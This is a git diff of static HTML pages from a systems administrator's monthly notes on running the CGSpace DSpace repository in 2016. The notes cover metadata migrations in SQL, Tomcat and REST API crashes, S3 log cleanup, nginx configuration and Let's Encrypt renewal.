  • Got notified by some CIFOR colleagues that the Google Scholar team had contacted them about CGSpace’s incorrect ordering of authors in Google Scholar metadata
  • +
  • Turns out there is a patch, and it was merged in DSpace 5.4: https://jira.duraspace.org/browse/DS-2679
  • +
  • I’ve merged it into our 5_x-prod branch that is currently based on DSpace 5.1
  • +
  • We found a bug when a user searches from the homepage, sorts the results, and then tries to click “View More” in a sidebar facet
  • +
  • I am not sure what causes it yet, but I opened an issue for it: https://github.com/ilri/DSpace/issues/179
  • +
  • Have more problems with SAFBuilder on Mac OS X
  • +
  • Now it doesn’t recognize description hints in the filename column, like: test.pdf__description:Blah
  • +
  • But on Linux it works fine
  • +
  • Trying to test Atmire’s series of stats and CUA fixes from January and February, but their branch history is really messy and it’s hard to see what’s going on
  • +
  • Rebasing their branch on top of our production branch results in a broken Tomcat, so I’m going to tell them to fix their history and make a proper pull request
  • +
  • Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: ' or , or = or [ or ] or ( or ) or _.pdf or ._ etc
  • +
  • It’s tricky to parse those things in some programming languages so I’d rather just get rid of the weird stuff now in OpenRefine:
  • +
+
value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
+
    +
  • Finally import the 1127 CIAT items into CGSpace: https://cgspace.cgiar.org/handle/10568/35710
  • +
  • Re-deploy CGSpace with the Google Scholar fix, but I’m waiting on the Atmire fixes for now, as the branch history is ugly
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html new file mode 100644 index 000000000..d59d7afd8 --- /dev/null +++ b/docs/2016-03/index.html @@ -0,0 +1,370 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + March, 2016 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

March, 2016

+ +
+

2016-03-02

+
    +
  • Looking at issues with author authorities on CGSpace
  • +
  • For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
  • +
  • Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
  • +
+

2016-03-07

+
    +
  • Troubleshooting the issues with the slew of commits for Atmire modules in #182
  • +
  • Their changes on 5_x-dev branch work, but it is messy as hell with merge commits and old branch base
  • +
  • When I rebase their branch on the latest 5_x-prod I get blank white pages
  • +
  • I identified one commit that causes the issue and let them know
  • +
  • Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:
  • +
+
Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
+

2016-03-08

+
    +
  • Add a few new filters to Atmire’s Listings and Reports module (#180)
  • +
  • We had also wanted to add a few to the Content and Usage module but I have to ask the editors which ones they were
  • +
+

2016-03-10

+
    +
  • Disable the lucene cron job on CGSpace as it shouldn’t be needed anymore
  • +
  • Discuss ORCiD and duplicate authors on Yammer
  • +
  • Request new documentation for Atmire CUA and L&R modules, as ours are from 2013
  • +
  • Walk Sisay through some data cleaning workflows in OpenRefine
  • +
  • Start cleaning up the configuration for Atmire’s CUA module (#184)
  • +
  • It is very messed up because some labels are incorrect, fields are missing, etc
  • +
+

Mixed up label in Atmire CUA

+
    +
  • Update documentation for Atmire modules
  • +
+

2016-03-11

+
    +
  • As I was looking at the CUA config I realized our Discovery config is all messed up and confusing
  • +
  • I’ve opened an issue to track some of that work (#186)
  • +
  • I did some major cleanup work on Discovery and XMLUI stuff related to the dc.type indexes (#187)
  • +
  • We had been confusing dc.type (a Dublin Core value) with dc.type.output (a value we invented) for a few years and it had permeated all aspects of our data, indexes, item displays, etc.
  • +
  • There is still some more work to be done to remove references to old outputtype and output
  • +
+

2016-03-14

+
    +
  • Fix some items that had invalid dates (I noticed them in the log during a re-indexing)
  • +
  • Reset search.index.* to the default, as it is only used by Lucene (deprecated by Discovery in DSpace 5.x): #188
  • +
  • Make titles in Discovery and Browse by more consistent (singular, sentence case, etc) (#186)
  • +
  • Also four or so center-specific subject strings were missing for Discovery
  • +
+

Missing XMLUI string

+

2016-03-15

+
    +
  • Create simple theme for new AVCD community just for a unique Google Tracking ID (#191)
  • +
+

2016-03-16

+
    +
  • Still having problems deploying Atmire’s CUA updates and fixes from January!
  • +
  • More discussion on the GitHub issue here: https://github.com/ilri/DSpace/pull/182
  • +
  • Clean up Atmire CUA config (#193)
  • +
  • Help Sisay with some PostgreSQL queries to clean up the incorrect dc.contributor.corporateauthor field
  • +
  • I noticed that we have some weird values in dc.language:
  • +
+
# select * from metadatavalue where metadata_field_id=37;
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
+-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
+           1942571 |       35342 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942468 |       35345 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942479 |       35337 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942505 |       35336 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942519 |       35338 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942535 |       35340 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942555 |       35341 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942588 |       35343 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942610 |       35346 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942624 |       35347 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942639 |       35339 |                37 | hi         |           |     1 |           |         -1 |                2
+
    +
  • It seems this dc.language field isn’t really used, but we should delete these values
  • +
  • Also, dc.language.iso has some weird values, like “En” and “English”
  • +
+
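    +
  • If we do delete them, the query would follow the same metadatavalue pattern used earlier in these notes (a sketch, against the test database first):
  • +
+
dspacetest=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=37 and text_value='hi';
+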

2016-03-17

+
    +
  • It turns out hi is the ISO 639 language code for Hindi, but these should be in dc.language.iso instead of dc.language
  • +
  • I fixed the eleven items with hi as well as some using the incorrect vn for Vietnamese
  • +
  • Start discussing CG core with Abenet and Sisay
  • +
  • Re-sync CGSpace database to DSpace Test for Atmire to do some tests about the problematic CUA patches
  • +
  • The patches work fine with a clean database, so the error was caused by some mismatch in CUA versions and the database during my testing
  • +
+

2016-03-18

+
    +
  • Merge Atmire fixes into 5_x-prod
  • +
  • Discuss thumbnails with Francesca from Bioversity
  • +
  • Some of their items end up with thumbnails that have a big white border around them:
  • +
+

Excessive whitespace in thumbnail

+
    +
  • Turns out we can add -trim to the GraphicsMagick options to trim the whitespace
  • +
+

Trimmed thumbnail

+
    +
  • Command used:
  • +
+
$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
+
    +
  • Also, it looks like adding -sharpen 0x1.0 really improves the quality of the image for only a few KB
  • +
+
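    +
  • For reference, the same command with the sharpen option added would be (a sketch):
  • +
+
$ gm convert -trim -quality 82 -thumbnail x300 -sharpen 0x1.0 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
+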

2016-03-21

+ +

CGSpace pages in Google index

+
    +
  • Turns out this is a problem with DSpace’s robots.txt, and there’s a Jira ticket since December, 2015: https://jira.duraspace.org/browse/DS-2962
  • +
  • I am not sure if I want to apply it yet
  • +
  • For now I’ve just set a bunch of these dynamic pages to not appear in search results by using the URL Parameters tool in Webmaster Tools
  • +
+

URL parameters cause millions of dynamic pages +Setting pages with the filter_0 param not to show in search results

+
    +
  • Move AVCD collection to new community and update move_collection.sh script: https://gist.github.com/alanorth/392c4660e8b022d99dfa
  • +
  • It seems Feedburner can do HTTPS now, so we might be able to update our feeds and simplify the nginx configs
  • +
  • Re-deploy CGSpace with latest 5_x-prod branch
  • +
  • Run updates on CGSpace and reboot server (new kernel, 4.5.0)
  • +
  • Deploy Let’s Encrypt certificate for cgspace.cgiar.org, but still need to work it into the ansible playbooks
  • +
+

2016-03-22

+
    +
  • Merge robots.txt patch and disallow indexing of browse pages as our sitemap is consumed correctly (#198)
  • +
+

2016-03-23

+ +
Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
+
    +
  • I can reproduce the same error on DSpace Test and on my Mac
  • +
  • Looks to be an issue with the Atmire modules, I’ve submitted a ticket to their tracker.
  • +
+

2016-03-24

+ +

2016-03-25

+
    +
  • Having problems with Listings and Reports, seems to be caused by a rogue reference to dc.type.output
  • +
  • This is the error we get when we proceed to the second page of Listings and Reports: https://gist.github.com/alanorth/b2d7fb5b82f94898caaf
  • +
  • Commenting out the line works, but I haven’t figured out the proper syntax for referring to dc.type.*
  • +
+

2016-03-28

+
    +
  • Look into enabling the embargo during item submission, see: https://wiki.lyrasis.org/display/DSDOC5x/Embargo#Embargo-SubmissionProcess
  • +
  • Seems we only want AccessStep because UploadWithEmbargoStep disables the ability to edit embargos at the item level
  • +
  • This pull request enables the ability to set an item-level embargo during submission: https://github.com/ilri/DSpace/pull/203
  • +
  • I figured out that the problem with Listings and Reports was because I disabled the search.index.* last week, and they are still used by JSPUI apparently
  • +
  • This pull request re-enables them: https://github.com/ilri/DSpace/pull/202
  • +
  • Re-deploy DSpace Test, run all system updates, and restart the server
  • +
  • Looks like the Listings and Reports fix was NOT due to the search indexes (which are actually not used), and rather due to the filter configuration in the Listings and Reports config
  • +
  • This pull request simply updates the config for the dc.type.output → dc.type change that was made last week: https://github.com/ilri/DSpace/pull/204
  • +
  • Deploy robots.txt fix, embargo for item submissions, and listings and reports fix on CGSpace
  • +
+

2016-03-29

+
    +
  • Skype meeting with Peter and Addis team to discuss metadata changes for Dublin Core, CGcore, and CGSpace-specific fields
  • +
  • We decided to proceed with some deletes first, then identify CGSpace-specific fields to clean/move to cg.*, and then worry about broader changes to DC
  • +
  • Before we move or rename any fields we need to circulate a list of fields we intend to change to CCAFS, CPWF, etc who might be harvesting the fields
  • +
  • After all of this we need to start implementing controlled vocabularies for fields, either with the Javascript lookup or like existing ILRI subjects
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html new file mode 100644 index 000000000..267498961 --- /dev/null +++ b/docs/2016-04/index.html @@ -0,0 +1,549 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + April, 2016 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

April, 2016

+ +
+

2016-04-04

+
    +
  • Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
  • +
  • We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
  • +
  • After running DSpace for over five years I’ve never needed to look in any other log file than dspace.log, let alone one from last year!
  • +
  • This will save us a few gigs of backup space we’re paying for on S3
  • +
  • Also, I noticed the checker log has some errors we should pay attention to:
  • +
+
Run start time: 03/06/2016 04:00:22
+Error retrieving bitstream ID 71274 from asset store.
+java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290601546459645925328536011917633626 (Too many open files)
+        at java.io.FileInputStream.open(Native Method)
+        at java.io.FileInputStream.<init>(FileInputStream.java:146)
+        at edu.sdsc.grid.io.local.LocalFileInputStream.open(LocalFileInputStream.java:171)
+        at edu.sdsc.grid.io.GeneralFileInputStream.<init>(GeneralFileInputStream.java:145)
+        at edu.sdsc.grid.io.local.LocalFileInputStream.<init>(LocalFileInputStream.java:139)
+        at edu.sdsc.grid.io.FileFactory.newFileInputStream(FileFactory.java:630)
+        at org.dspace.storage.bitstore.BitstreamStorageManager.retrieve(BitstreamStorageManager.java:525)
+        at org.dspace.checker.BitstreamDAO.getBitstream(BitstreamDAO.java:60)
+        at org.dspace.checker.CheckerCommand.processBitstream(CheckerCommand.java:303)
+        at org.dspace.checker.CheckerCommand.checkBitstream(CheckerCommand.java:171)
+        at org.dspace.checker.CheckerCommand.process(CheckerCommand.java:120)
+        at org.dspace.app.checker.ChecksumChecker.main(ChecksumChecker.java:236)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:606)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:225)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:77)
+******************************************************
+
    +
  • So this would be the tomcat7 Unix user, who seems to have a default limit of 1024 files in its shell
  • +
  • For what it’s worth, we have been setting the actual Tomcat 7 process’ limit to 16384 for a few years (in /etc/default/tomcat7)
  • +
  • Looks like cron will read limits from /etc/security/limits.* so we can do something for the tomcat7 user there
  • +
  • Submit pull request for Tomcat 7 limits in Ansible dspace role (#30)
  • +
+
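    +
  • Such an entry might look something like this (a sketch; the file name under limits.d is arbitrary):
  • +
+
# cat /etc/security/limits.d/tomcat7.conf
+tomcat7 soft nofile 16384
+tomcat7 hard nofile 16384
+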

2016-04-05

+
    +
  • Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don’t need!
  • +
+
# s3cmd ls s3://cgspace.cgiar.org/log/ > /tmp/s3-logs.txt
+# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+
    +
  • Also, adjust the cron jobs for backups so they only backup dspace.log and some stats files (.dat)
  • +
  • Try to do some metadata field migrations using the Atmire batch UI (dc.Species → cg.species) but it took several hours and even missed a few records
  • +
+

2016-04-06

+
    +
  • A better way to move metadata on this scale is via SQL, for example dc.type.output → dc.type (their IDs in the metadatafieldregistry are 66 and 109, respectively):
  • +
+
dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
+UPDATE 40852
+
    +
  • After that an index-discovery -bf is required
  • +
  • Start working on metadata migrations, add 25 or so new metadata fields to CGSpace
  • +
+
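    +
  • For reference, that full re-index as I run it locally:
  • +
+
$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
+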

2016-04-07

+ +
$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40883
+UPDATE metadatavalue SET metadata_field_id=202 WHERE metadata_field_id=72
+UPDATE 21420
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51258
+

2016-04-08

+
    +
  • Discuss metadata renaming with Abenet, we decided it’s better to start with the center-specific subjects like ILRI, CIFOR, CCAFS, IWMI, and CPWF
  • +
  • I’ve e-mailed CCAFS and CPWF people to ask them how much time it will take for them to update their systems to cope with this change
  • +
+

2016-04-10

+ +
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
+ count
+-------
+  5638
+(1 row)
+
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
+ count
+-------
+     3
+
    +
  • I will manually edit the dc.identifier.doi in 10568/72509 and tweet the link, then check back in a week to see if the donut gets updated
  • +
+

2016-04-11

+
    +
  • The donut is already updated and shows the correct number now
  • +
  • CCAFS people say it will only take them an hour to update their code for the metadata renames, so I proposed we’d do it tentatively on Monday the 18th.
  • +
+

2016-04-12

+
    +
  • Looking at quality of WLE data (cg.subject.iwmi) in SQL:
  • +
+
dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
+
    +
  • Listings and Reports is still not returning reliable data for dc.type
  • +
  • I think we need to ask Atmire, as their documentation isn’t too clear on the format of the filter configs
  • +
  • Alternatively, I want to see if it behaves better after I move all the data from dc.type.output to dc.type and re-index
  • +
  • Looking at our input-forms.xml I see we have two sets of ILRI subjects, but one has a few extra subjects
  • +
  • Remove one set of ILRI subjects and remove duplicate VALUE CHAINS from existing list (#216)
  • +
  • I decided to keep the set of subjects that had FMD and RANGELANDS added, as those appear to have been added by request and it is probably the newer list
  • +
  • I found 226 blank metadatavalues:
  • +
+
dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
+
    +
  • I think we should delete them and do a full re-index:
  • +
+
dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
+DELETE 226
+
    +
  • I deleted them on CGSpace but I’ll wait to do the re-index as we’re going to be doing one in a few days for the metadata changes anyways
  • +
  • In other news, moving the dc.type.output to dc.type and re-indexing seems to have fixed the Listings and Reports issue from above
  • +
  • Unfortunately this isn’t a very good solution, because Listings and Reports config should allow us to filter on dc.type.* but the documentation isn’t very clear and I couldn’t reach Atmire today
  • +
  • We want to do the dc.type.output move on CGSpace anyways, but we should wait as it might affect other external people!
  • +
+

2016-04-14

+
    +
  • Communicate with Macaroni Bros again about dc.type
  • +
  • Help Sisay with some rsync and Linux stuff
  • +
  • Notify CIAT people of metadata changes (I had forgotten them last week)
  • +
+

2016-04-15

+
    +
  • DSpace Test had crashed, so I ran all system updates, rebooted, and re-deployed DSpace code
  • +
+

2016-04-18

+
    +
  • Talk to CIAT people about their portal again
  • +
  • Start looking more at the fields we want to delete
  • +
  • The following metadata fields have 0 items using them, so we can just remove them from the registry and any references in XMLUI, input forms, etc: +
      +
    • dc.description.abstractother
    • +
    • dc.whatwasknown
    • +
    • dc.whatisnew
    • +
    • dc.description.nationalpartners
    • +
    • dc.peerreviewprocess
    • +
    • cg.species.animal
    • +
    +
  • +
  • Deleted!
  • +
  • The following fields have some items using them and I have to decide what to do with them (delete or move): +
      +
    • dc.icsubject.icrafsubject: 6 items, mostly in CPWF collections
    • +
    • dc.type.journal: 11 items, mostly in ILRI collections
    • +
    • dc.publicationcategory: 1 item, in CPWF
    • +
    • dc.GRP: 2 items, CPWF
    • +
    • dc.Species.animal: 6 items, in ILRI and AnGR
    • +
    • cg.livestock.agegroup: 9 items, in ILRI collections
    • +
    • cg.livestock.function: 20 items, mostly in EADD
    • +
    +
  • +
  • Test metadata migration on local instance again:
  • +
+
$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40885
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51330
+UPDATE metadatavalue SET metadata_field_id=208 WHERE metadata_field_id=82
+UPDATE 5986
+UPDATE metadatavalue SET metadata_field_id=210 WHERE metadata_field_id=88
+UPDATE 2456
+UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
+UPDATE 3872
+UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
+UPDATE 46075
+$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
+
    +
  • CGSpace was down but I’m not sure why, this was in catalina.out:
  • +
+
Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
+SEVERE: Mapped exception to response: 500 (Internal Server Error)
+javax.ws.rs.WebApplicationException
+        at org.dspace.rest.Resource.processFinally(Resource.java:163)
+        at org.dspace.rest.HandleResource.getObject(HandleResource.java:81)
+        at sun.reflect.GeneratedMethodAccessor198.invoke(Unknown Source)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:606)
+        at com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60)
+        at com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$TypeOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:185)
+        at com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:75)
+        at com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:302)
+        at com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147)
+        at com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:108)
+        at com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147)
+        at com.sun.jersey.server.impl.uri.rules.RootResourceClassesRule.accept(RootResourceClassesRule.java:84)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1511)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1442)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1391)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1381)
+        at com.sun.jersey.spi.container.servlet.WebComponent.service(WebComponent.java:416)
+...
+
    +
  • Everything else in the system looked normal (50GB disk space available, nothing weird in dmesg, etc)
  • +
  • After restarting Tomcat a few more of these errors were logged but the application was up
  • +
+

2016-04-19

+
    +
  • Get handles for items that are using a given metadata field, ie dc.Species.animal (105):
  • +
+
# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
+   handle
+-------------
+ 10568/10298
+ 10568/16413
+ 10568/16774
+ 10568/34487
+
    +
  • Delete metadata values for dc.GRP and dc.icsubject.icrafsubject:
  • +
+
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=83;
+
    +
  • They are old ICRAF fields and we haven’t used them since 2011 or so
  • +
  • Also delete them from the metadata registry
  • +
  • CGSpace went down again, dspace.log had this:
  • +
+
2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • I restarted Tomcat and PostgreSQL and now it’s back up
  • +
  • I bet this is the same crash as yesterday, but I only saw the errors in catalina.out
  • +
  • Looks to be related to this, from dspace.log:
  • +
+
2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
+
    +
  • We have 18,000 of these errors right now…
  • +
  • Delete a few more old metadata values: dc.Species.animal, dc.type.journal, and dc.publicationcategory:
  • +
+
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=85;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=95;
+
    +
  • And then remove them from the metadata registry
  • +
+

2016-04-20

+
    +
  • Re-deploy DSpace Test with the new subject and type fields, run all system updates, and reboot the server
  • +
  • Migrate fields and re-deploy CGSpace with the new subject and type fields, run all system updates, and reboot the server
  • +
  • Field migration went well:
  • +
+
$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40909
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51419
+UPDATE metadatavalue SET metadata_field_id=208 WHERE metadata_field_id=82
+UPDATE 5986
+UPDATE metadatavalue SET metadata_field_id=210 WHERE metadata_field_id=88
+UPDATE 2458
+UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
+UPDATE 3872
+UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
+UPDATE 46075
+
    +
  • Also, I migrated CGSpace to using the PGDG PostgreSQL repo as the infrastructure playbooks had been using it for a while and it seemed to be working well
  • +
  • Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)
  • +
  • Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:
  • +
+
$ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
+21252
+
    +
  • I found a recent discussion on the DSpace mailing list and I’ve asked for advice there
  • +
  • Looks like this issue was noted and fixed in DSpace 5.5 (we’re on 5.1): https://jira.duraspace.org/browse/DS-2936
  • +
  • I’ve sent a message to Atmire asking about compatibility with DSpace 5.5
  • +
+

2016-04-21

+
    +
  • Fix a bunch of metadata consistency issues with IITA Journal Articles (Peer review, Formally published, messed up DOIs, etc)
  • +
  • Atmire responded with DSpace 5.5 compatible versions for their modules, so I’ll start testing those in a few weeks
  • +
+

2016-04-22

+ +

2016-04-26

+ +

2016-04-27

+
    +
  • I woke up to ten or fifteen “up” and “down” emails from the monitoring website
  • +
  • Looks like the last one was “down” from about four hours ago
  • +
  • I think there must be something with this REST stuff:
  • +
+
# grep -c "Aborting context in finally statement" dspace.log.2016-04-*
+dspace.log.2016-04-01:0
+dspace.log.2016-04-02:0
+dspace.log.2016-04-03:0
+dspace.log.2016-04-04:0
+dspace.log.2016-04-05:0
+dspace.log.2016-04-06:0
+dspace.log.2016-04-07:0
+dspace.log.2016-04-08:0
+dspace.log.2016-04-09:0
+dspace.log.2016-04-10:0
+dspace.log.2016-04-11:0
+dspace.log.2016-04-12:235
+dspace.log.2016-04-13:44
+dspace.log.2016-04-14:0
+dspace.log.2016-04-15:35
+dspace.log.2016-04-16:0
+dspace.log.2016-04-17:0
+dspace.log.2016-04-18:11942
+dspace.log.2016-04-19:28496
+dspace.log.2016-04-20:28474
+dspace.log.2016-04-21:28654
+dspace.log.2016-04-22:28763
+dspace.log.2016-04-23:28773
+dspace.log.2016-04-24:28775
+dspace.log.2016-04-25:28626
+dspace.log.2016-04-26:28655
+dspace.log.2016-04-27:7271
+
    +
  • I restarted tomcat and it is back up
  • +
  • Add Spanish XMLUI strings so those users see “CGSpace” instead of “DSpace” in the user interface (#222)
  • +
  • Submit patch to upstream DSpace for the misleading help text in the embargo step of the item submission: https://jira.duraspace.org/browse/DS-3172
  • +
  • Update infrastructure playbooks for nginx 1.10.x (stable) release: https://github.com/ilri/rmg-ansible-public/issues/32
  • +
  • Currently running on DSpace Test, we’ll give it a few days before we adjust CGSpace
  • +
  • CGSpace down, restarted tomcat and it’s back up
  • +
+

2016-04-28

+
    +
  • Problems with stability again. I’ve blocked access to /rest for now to see if the number of errors in the log files drops
  • +
  • Later we could maybe start logging access to /rest and perhaps whitelist some IPs…
  • +
+

2016-04-30

+
    +
  • Logs for today and yesterday have zero references to this REST error, so I’m going to open back up the REST API but log all requests
  • +
+
location /rest {
+	access_log /var/log/nginx/rest.log;
+	proxy_pass http://127.0.0.1:8443;
+}
+
    +
  • I will check the logs again in a few days to look for patterns, see who is accessing it, etc
  • +
diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html (new file)

May, 2016

+ +
+

2016-05-01

+
    +
  • Since yesterday there have been 10,000 REST errors and the site has been unstable again
  • +
  • I have blocked access to the API now
  • +
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
+3168
+
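  • Note that without a sort the uniq above only collapses adjacent duplicates, so 3168 is an upper bound; a more accurate count of unique IPs would be something like:

# awk '{print $1}' /var/log/nginx/rest.log | sort -u | wc -l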
    +
  • The two most frequent requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29
  • +
  • 100% of the requests coming from Ethiopia are like this and result in an HTTP 500:
  • +
+
GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
+
    +
  • For now I’ll block just the Ethiopian IP
  • +
  • The owner of that application has said that the NaN (not a number) is an error in his code and he’ll fix it
  • +
+

2016-05-03

+
    +
  • Update nginx to 1.10.x branch on CGSpace
  • +
  • Fix a reference to dc.type.output in Discovery that I had missed when we migrated to dc.type last month (#223)
  • +
+

Item type in Discovery results

+

2016-05-06

+
    +
  • DSpace Test is down, catalina.out has lots of messages about heap space from some time yesterday (!)
  • +
  • It looks like Sisay was doing some batch imports
  • +
  • Hmm, also disk space is full
  • +
  • I decided to blow away the solr indexes, since they are 50GB and we don’t really need all the Atmire stuff there right now
  • +
  • I will re-generate the Discovery indexes after re-deploying
  • +
  • Testing renew-letsencrypt.sh script for nginx
  • +
+
#!/usr/bin/env bash
+
+readonly SERVICE_BIN=/usr/sbin/service
+readonly LETSENCRYPT_BIN=/opt/letsencrypt/letsencrypt-auto
+
+# stop nginx so LE can listen on port 443
+$SERVICE_BIN nginx stop
+
+$LETSENCRYPT_BIN renew -nvv --standalone --standalone-supported-challenges tls-sni-01 > /var/log/letsencrypt/renew.log 2>&1
+
+LE_RESULT=$?
+
+$SERVICE_BIN nginx start
+
+if [[ "$LE_RESULT" != 0 ]]; then
+    echo 'Automated renewal failed:'
+
+    cat /var/log/letsencrypt/renew.log
+
+    exit 1
+fi
+
    +
  • Seems to work well
  • +
+

2016-05-10

+
    +
  • Start looking at more metadata migrations
  • +
  • There are lots of fields in dcterms namespace that look interesting, like: +
      +
    • dcterms.type
    • +
    • dcterms.spatial
    • +
    +
  • +
  • Not sure what dcterms is…
  • +
  • Looks like these were added in DSpace 4 to allow for future work to make DSpace more flexible
  • +
  • CGSpace’s dc registry has 96 items, and the default DSpace one has 73.
  • +
+

2016-05-11

+
    +
